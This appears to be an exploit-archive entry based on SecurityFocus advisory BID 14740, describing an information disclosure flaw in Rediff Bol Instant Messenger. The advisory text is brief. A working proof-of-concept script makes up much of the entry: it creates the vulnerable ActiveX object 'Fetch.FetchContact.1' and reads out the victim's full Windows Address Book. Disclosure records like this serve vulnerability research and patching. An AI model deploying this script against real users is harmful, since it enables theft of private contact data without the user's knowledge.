source: https://www.securityfocus.com/bid/14740/info Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book. [script] var Obj = new ActiveXObject("Fetch.FetchContact.1"); alert(Obj.FullAddressBook(0,"","","")); [/script]